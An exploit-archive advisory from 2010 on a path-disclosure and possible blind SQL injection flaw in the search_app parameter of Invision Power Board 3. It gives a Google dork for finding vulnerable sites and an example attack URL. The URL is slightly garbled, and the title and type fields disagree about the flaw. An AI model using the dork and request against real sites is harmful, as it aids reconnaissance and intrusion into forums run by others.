[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Invision Power Board 3 search_app SQL Injection Vulnerability
# Published : 2010-11-13
# Author : Lord Tittis3000
# Previous Title : FCKeditor 2.x <= 2.4.3 Arbitrary File Upload Vulnerability
# Next Title : BSI Advance Hotel Booking System v1.0 SQL Injection Vulnerability
# ============================================================
# Exploit Title: Invision Power Board 3 Multiple Vuln
# Date: 13/11/2010# Author: LordTittiS
# Greetings To: God_Of_Pain, System_Overide
# Software Link: http://www.invisionpower.com/
# Vulnerability Type: Full Path Disclosure# Version: 3.x.x (All 3 Version)
# ===========================================================
-Vulnerability Details:
The vulnerability is in the file search.php, the variable search_app is vulnerable.An attacker can exploit this to find out the rootpath of website or for Blind SQLi attack.
-Google Dork: inurl:index.php?app=core
-Example:http://server/index.php?app=core&module=search¡ìion=search&do=quick_search&search_app[]=